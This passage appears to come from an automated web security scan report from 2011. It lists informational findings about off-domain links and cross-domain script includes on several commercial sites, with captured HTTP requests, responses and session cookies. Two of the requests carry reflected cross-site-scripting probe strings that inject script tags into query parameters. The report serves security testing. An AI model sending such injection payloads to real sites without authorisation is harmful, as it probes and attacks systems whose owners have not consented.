<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

17.324. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<div style="width:150px; height:1px; padding:0px; font:11px Tahoma; overflow:hidden;"><a href="http://www.buybooks.ws/" title="Ebooks buy">Ebooks buy</A>
...[SNIP]...
<td style="text-align: left;"><a href="http://www.boats.com"><img src="/images/buttons/boatscom.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.boattrader.com"><img src="/images/buttons/boattrader.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.yachtworld.com"><img style="border: medium none; float: right;" src="/images/buttons/yachtworld.jpg" />
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

17.325. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /index.php?option=com_chronocontact&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><img src="http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif" width="150" border="0" height="150" /></a>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=58g&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

17.326. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:02:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<div style="width:150px; height:1px; padding:0px; font:11px Tahoma; overflow:hidden;"><a href="http://www.buybooks.ws/" title="Ebooks buy">Ebooks buy</A>
...[SNIP]...
<div class='CommentPoweredBy'><a href="http://yurivolkov.com/Joomla/yvComment/index_en.html" target="_blank" rel="nofollow">yvComment v.1.24.0</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

17.327. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:09 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
<td style="padding-bottom: 10px; padding-left:10px; vertical-align:middle;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.facebook.com/pages/Style-Me-Pretty/51850479973">Visit us on <b>
...[SNIP]...
<td style="padding-left:10px; vertical-align:middle; padding-bottom:10px;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.twitter.com/stylemepretty">Follow us on <b>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

17.328. http://www.zvents.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1 HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:47:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 36
ETag: "f6fdb354bde5166311154377417abd13"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:47:18 GMT; HttpOnly
Content-Length: 62688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
</script>


<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">

<!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY -->
<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<!-- Segment Pixel for DFW -->
<img src="https://secure.adnxs.com/seg?add=87282&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
...[SNIP]...
<!--Leaderboard code -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- Test 1x1 Leaderboard code -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div class='ad_comp'><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.329. http://xads.zedo.com/ads2/c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads2/c

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:31 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/
Vary: Accept-Encoding
Content-Length: 402
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/">here</a>
...[SNIP]...

18. Cross-domain script include
There are 903 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


18.1. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 336

<script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aGmNQCREnQQcFoQWYM1WvnW6Yx3G310UFIUAXn2PUbPmJD2HZbt0HvZandIy3mBQ3GQ6UcYjWsbeSAYuUWnPTrMR2U2tUqrxVaJbSTQLQcfCQUmoPHvcVGbU5FyrmWeOXqqm2W3FPsBG2mBZaptEmVdj9YFYb1UYXs21w50/"></script>

18.2. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
